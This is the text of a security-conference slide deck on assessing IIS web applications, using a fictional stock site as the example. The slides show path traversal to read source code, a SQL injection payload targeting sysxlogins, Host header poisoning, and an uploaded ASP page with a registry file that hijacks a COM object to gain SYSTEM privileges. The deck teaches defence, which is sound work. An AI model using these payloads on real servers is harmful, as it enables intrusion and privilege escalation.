application assessments on iis

Application Assessments on IISApplication Assessments on IIS

Welcome!

David Litchfield

(d.litchfield@atstake.com)

What is an Application Assessment?

Part of a network vulnerability assessment

Application provides the site functionality

Application is least tested but often proves to be the

greatest risk

Vulnerability Scanners

• Cybercop

• I. S. S.

• Cerberus Internet Scanner

What scanners do do

They highlight known vulnerabilities in COTS products

Webhits.dll and null.htw

MSADC and RDS

Ism.dll and .htr overflow

%C0%AF UNICODE issue

What scanners don’t do

They won’t assess your application

Assessing the Application

What services does the site offer?

What functionality exists to provide these services?

What drives this functionality?

How does it do this?

Stocks-r-us.com

• Free charting service of current/real-time market trends

• A subscriber service providing detailed market analysis

• An “I’ve forgot my password” service

• A contact service

• Apply for a job with stocks-r-us.com online service

Free charting service of current/real-time market trends

• From a web form a user chooses the stock market

• They also choose a time range

• On Submitting a page called read_img.asp returns a graph

of the ups and downs of the market:

http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png

http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=

Exception Handling

ASP Error 800814:

Create object failed in /includes/olectra.inc

Downloading the .inc file reveals nothing but there are

two issues here: bad exception handling and .inc has

not been mapped to asp.dll

A search on google reveals Olectra Chart

Source code revelation!

Olectra creates a virtual directory called /octemp

When a graph or chart is produced a temp directory is created in the /octemp directory. This directory’s name is a number like “00000008”

The dynamically produced graph is a random string of letters such as “AXYZPQ” and has a file extension of .png

/read_img.asp?IDN=../&IFN=read_img&IFE=asp

SQL Queries

strSQL = “select price from stocks where name = ‘”

_ & request.querystring(“company”) & “’”

This code is insecure!!!

Why?

By setting the “company” parameter to something such as:

ISSX’ select * from master..sysxlogins

Would execute the two queries in batch mode:

Select price from stocks where name= ‘ISSX’Select * from master..sysxlogins

‘sa’ login on MS SQL Server

xp_cmdshell extended stored procedure

On its own, ASP will not escape a single ‘ (quote mark)

.idc files will.

Change all ‘s provided in a parameter to 0x27 or strip them out

Consideration for integer input

strSQL = “Select company from stocks where price > “ & request.querystring(“price”)

Again we can insert an arbitrary SQL query here and have it execute.

IsNumeric() for VBScript

NaN() fro JScript

Verifying numeric input

r.f.p – Rain Forest Puppy

http://www.wiretrip.net/rfp

Contact Service

<%

..

SMTPObj = GetObject(

“IIS://” & request.servervariables(“SERVER_NAME”) & “/SMTPSVC”)

..

%>

HTTP SERVER_NAME Poisoning

“Host:” HTTP Client Header field

• Learn the password hash for the IWAM account

• Enumerate SQL servers

• Proxy attacks

• Samples on IIS

• ADSI, Corba and COM

On-line job application service

As part of this service stocks-r-us.com allow uploading of Curriculum Vitaes / Resumes

Client Side checking doesn’t work

Scripting enabled on the /cvtemp virtual directory

Gaining SYSTEM Privileges using ASP

• IIS Security Model

• IUSR and IWAM accounts

Wscript.Shell Object

WSObj = CreateObject(“wscript.shell”)

• Read from the Registry

• Write to the Regsitry

• Execute commands

<%

Dim WshShell, strCMD, result

strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"

strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"

Set WshShell = Server.CreateObject("Wscript.Shell")

On Error Resume Next

result = WshShell.Run(strCMD)

result = WshShell.Run(strCMD2)

%>

MSI.ASP

REGEDIT4

[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]

@="c:\\inetpub\\wwwroot\\foo.dll"

"ThreadingModel"="Both"

MSI.REG

Summary

• Understand the technology you’re dealing with

• Never trust user input – anywhere

• Ensure permissions are set properly

• Don’t trust third-party software until truly evaluated

• Don’t rely on client side checking

• Scanners won’t find these problems – you will

Questions?

Thanks and enjoy the rest the day!